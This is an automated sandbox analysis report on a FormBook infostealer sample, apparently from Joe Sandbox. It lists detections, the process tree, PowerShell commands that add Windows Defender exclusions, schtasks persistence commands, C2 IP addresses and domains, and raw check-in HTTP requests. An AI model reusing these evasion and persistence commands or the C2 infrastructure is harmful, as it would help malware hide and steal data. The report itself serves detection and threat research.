Windows Analysis Report
n2pGr8w21V.exe

Overview

General Information

Sample name: n2pGr8w21V.exe (renamed because original name is a hash value)
Original sample name: 5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502.exe
Analysis ID: 1588691
MD5: 8d46baf183c4f911ea9bf65c8797d8ea
SHA1: 1c65169105317dd39497d511f4c7cc1592fbfb69
SHA256: 5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • n2pGr8w21V.exe (PID: 2620 cmdline: "C:\Users\user\Desktop\n2pGr8w21V.exe" MD5: 8D46BAF183C4F911EA9BF65C8797D8EA)
    • powershell.exe (PID: 7440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7480 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uEugNEto.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7800 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7512 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7688 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • ISaSZznjXcpoJ.exe (PID: 6428 cmdline: "C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systray.exe (PID: 8180 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • ISaSZznjXcpoJ.exe (PID: 6896 cmdline: "C:\Program Files (x86)\GFsImQVHNEQZxUwbhDneezFpyfJJaThlrIXiWSAPfvZayXrwZhkYUBnOQkx\ISaSZznjXcpoJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1004 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • uEugNEto.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\uEugNEto.exe MD5: 8D46BAF183C4F911EA9BF65C8797D8EA)
    • schtasks.exe (PID: 8084 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8128 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author
15.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", ProcessId: 7440, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\uEugNEto.exe, ParentImage: C:\Users\user\AppData\Roaming\uEugNEto.exe, ParentProcessId: 7852, ParentProcessName: uEugNEto.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpEA52.tmp", ProcessId: 8084, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", ProcessId: 7512, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\n2pGr8w21V.exe", ProcessId: 7440, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\n2pGr8w21V.exe", ParentImage: C:\Users\user\Desktop\n2pGr8w21V.exe, ParentProcessId: 2620, ParentProcessName: n2pGr8w21V.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uEugNEto" /XML "C:\Users\user\AppData\Local\Temp\tmpB98D.tmp", ProcessId: 7512, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-11T04:15:55.795996+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49999 | 188.114.96.3 | 80 | TCP
2025-01-11T04:17:00.769441+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49978 | 162.0.215.33 | 80 | TCP
2025-01-11T04:17:03.332141+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49979 | 162.0.215.33 | 80 | TCP
2025-01-11T04:17:05.895359+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49980 | 162.0.215.33 | 80 | TCP
2025-01-11T04:17:14.012290+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49982 | 104.18.73.116 | 80 | TCP
2025-01-11T04:17:16.576340+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49983 | 104.18.73.116 | 80 | TCP
2025-01-11T04:17:19.121223+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49984 | 104.18.73.116 | 80 | TCP
2025-01-11T04:17:28.228467+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49986 | 192.185.147.100 | 80 | TCP
2025-01-11T04:17:30.351099+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49987 | 192.185.147.100 | 80 | TCP
2025-01-11T04:17:32.930452+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49988 | 192.185.147.100 | 80 | TCP
2025-01-11T04:17:40.765854+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49990 | 13.248.169.48 | 80 | TCP
2025-01-11T04:17:43.321805+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49991 | 13.248.169.48 | 80 | TCP
2025-01-11T04:17:45.866714+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49992 | 13.248.169.48 | 80 | TCP
2025-01-11T04:17:58.927917+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49994 | 15.197.148.33 | 80 | TCP
2025-01-11T04:18:01.489180+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49995 | 15.197.148.33 | 80 | TCP
2025-01-11T04:18:04.955418+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49996 | 15.197.148.33 | 80 | TCP
2025-01-11T04:18:13.859937+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.7 | 49998 | 188.114.96.3 | 80 | TCP

AV Detection

Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | ReversingLabs: Detection: 68%
Source: n2pGr8w21V.exe | ReversingLabs: Detection: 68%
Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000017.00000002.2508381600.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1575119582.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.2513591894.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2511826108.0000000004DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1576124904.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000002.2507252400.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.2511173788.0000000003760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1578348944.00000000022B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Joe Sandbox ML: detected
Source: n2pGr8w21V.exe | Joe Sandbox ML: detected
Source: n2pGr8w21V.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: n2pGr8w21V.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: systray.pdb source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 0000000F.00000002.1575865411.0000000001107000.00000004.00000020.00020000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000016.00000002.2510055653.00000000011D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISaSZznjXcpoJ.exe, 00000016.00000002.2507158297.000000000081E000.00000002.00000001.01000000.0000000E.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2509185482.000000000081E000.00000002.00000001.01000000.0000000E.sdmp
                Source: Binary string: RegSvcs.pdb, source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdb source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1575412489.0000000004EAD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.000000000539E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512370768.0000000005200000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000017.00000003.1577378357.000000000505A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: RegSvcs.pdb source: systray.exe, 00000017.00000002.2508850216.0000000003522000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000017.00000002.2512922275.000000000582C000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000289C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.1878823883.00000000353FC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: OavGB.pdbSHA256g source: n2pGr8w21V.exe, uEugNEto.exe.0.dr
Source: C:\Users\user\AppData\Roaming\uEugNEto.exe | Code function: 4x nop then jmp 0BFB07D3h | 17_2_0BFB1008

Networking

Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49980 -> 162.0.215.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49990 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49994 -> 15.197.148.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49991 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49978 -> 162.0.215.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49992 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49983 -> 104.18.73.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49986 -> 192.185.147.100:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49984 -> 104.18.73.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49995 -> 15.197.148.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49998 -> 188.114.96.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49987 -> 192.185.147.100:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49979 -> 162.0.215.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49996 -> 15.197.148.33:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49988 -> 192.185.147.100:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49982 -> 104.18.73.116:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49999 -> 188.114.96.3:80
Source: Joe Sandbox View | IP Address: 162.0.215.33
Source: Joe Sandbox View | IP Address: 104.18.73.116
Source: Joe Sandbox View | IP Address: 15.197.148.33
Source: Joe Sandbox View | ASN Name: ACPCA
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: TANDEMUS
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 HTTP/1.1Host: www.holytur.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF HTTP/1.1Host: www.losmason.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 HTTP/1.1Host: www.hayaniya.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 HTTP/1.1Host: www.lovel.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                Source: global trafficHTTP traffic detected: GET /zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 HTTP/1.1Host: www.duskgazes.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Source: global traffic | DNS traffic detected: DNS query: www.holytur.net
Source: global traffic | DNS traffic detected: DNS query: www.nieuws-july202488.sbs
Source: global traffic | DNS traffic detected: DNS query: www.losmason.shop
Source: global traffic | DNS traffic detected: DNS query: www.hayaniya.org
Source: global traffic | DNS traffic detected: DNS query: www.lovel.shop
Source: global traffic | DNS traffic detected: DNS query: www.duskgazes.work
Source: global traffic | DNS traffic detected: DNS query: www.zrinorem-srumimit.sbs
                Source: unknownHTTP traffic detected: POST /30le/ HTTP/1.1Host: www.nieuws-july202488.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflateConnection: closeContent-Length: 220Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedOrigin: http://www.nieuws-july202488.sbsReferer: http://www.nieuws-july202488.sbs/30le/User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; ZTE-Z777 Build/JLS36C) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30Data Raw: 4d 48 4a 30 47 58 69 3d 75 46 73 62 59 4b 78 69 4a 78 59 70 67 4a 65 35 64 58 45 46 70 45 32 49 67 50 58 47 6e 79 32 78 79 75 35 31 50 58 53 64 68 46 6b 49 6a 7a 62 30 4f 54 36 2b 4c 6c 6c 35 6d 35 55 59 7a 51 42 71 66 36 6b 4e 52 4f 55 61 76 56 37 73 4f 6f 62 68 69 6d 4b 30 65 6b 6e 49 41 6b 2b 69 6c 36 61 65 6e 4d 49 76 38 64 50 43 31 32 4a 4e 65 70 30 36 32 2f 70 35 4c 59 74 65 6f 6e 69 44 56 6c 31 35 67 45 67 44 79 45 6c 2b 32 38 41 58 51 6f 33 32 75 30 48 7a 53 4b 6f 78 79 72 51 71 38 66 62 43 53 64 67 6a 39 6c 69 43 31 5a 52 56 6c 4c 7a 6c 45 67 47 63 69 4a 5a 51 59 31 35 35 35 76 49 4c 78 56 58 31 61 4f 7a 70 72 39 50 52 6f 55 4b 53 6b 67 3d 3d Data Ascii: 